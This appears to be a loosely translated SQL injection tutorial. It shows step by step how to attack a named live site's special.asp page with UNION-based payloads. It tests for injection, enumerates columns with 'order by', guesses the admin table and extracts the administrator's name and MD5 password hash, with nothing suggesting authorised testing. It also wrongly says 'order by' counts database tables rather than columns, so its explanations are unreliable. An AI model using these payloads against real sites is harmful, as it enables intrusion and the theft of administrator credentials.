Injection notes-joint Query

After learning how to determine the injection point, we need to learn the statements that can actually obtain sensitive information. In this chapter, we need to learn the simplest Union query statements.

Glossary:

Joint query: queries of two tables are combined by performing operations equivalent to appending one table to another.

When injecting a website, we must first determine whether there are injection points. Let's first determine.

To make the display more concise and clear, I will replace the space with the + sign, because after the url is submitted, the space will be converted to % 20.

Use and 1 = 1 and 1 = 2 to check whether the injection point is determined,

Http://www.lanxum.com/special.asp? Id = 198 + and + 1 = 1Return normal

Http://www.lanxum.com/special.asp? Id = 198 + and + 1 = 2Error returned

Indicates that there is an injection point.

The order by statement is used to query the number of data tables in the database.

For example, if there are 10 tables in the database, order by 10 will return a normal result. If we query whether there are 11 tables, it is obvious that there are no 11 tables in the database, and of course an error will be returned.

I found 19 data tables in the database on this site,

Order by 19 returns normal

Order by 20 returns an error

Make sure that there are 19 tables in the database. Then we need to query sensitive table information. For example, the Administrator table is usually admin or user, which is usually collected here.

The statement used to query an existing table is and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9 from table name. Of course, this is followed by a number.

If it is of the character type, it should be changed to and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9 from Table Name

Union means union. select means query. You can translate words directly in English, which is easy to understand.

Here we enter:Http://www.lanxum.com/special.asp? Id = 198+ And + 1 = 2 + union + select + 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 + from + admin

Return Value:

Here there are numbers in some locations, which indicates that the admin table exists. These numbers correspond to the number corresponding to the select statement in the address bar.

If the table we query does not exist, the error page is returned.

I want to query the user table:Http://www.lanxum.com/special.asp? Id = 198+ And + 1 = 2 + union + select + 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 + from + user

Return Value:

An error is returned, indicating that the user table does not exist.

Next we will guess the content in the specified table segment. Enter the field name that we want to guess in the number corresponding to the return page.

Here I guess the name field in the admin table.

Http://www.lanxum.com/special.asp? Id = 198+ And + 1 = 2 + union + select + 1, Name, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 + from + admin

Replace "2" with "name" and return the user name, indicating that the name field exists. The obtained user name is only the first data content. We will query the pass field.

Http://www.lanxum.com/special.asp? Id = 198+ And + 1 = 2 + union + select + 1, Name, 3, 4, 5, 6, pass, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 + from + admin

The 16-bit md5 encryption password is returned. Of course, I have already tested the field and table segment name here, so I will guess it, if the Administrator modifies the table segment and field name in a complex way, we may not guess it.

All right, join query.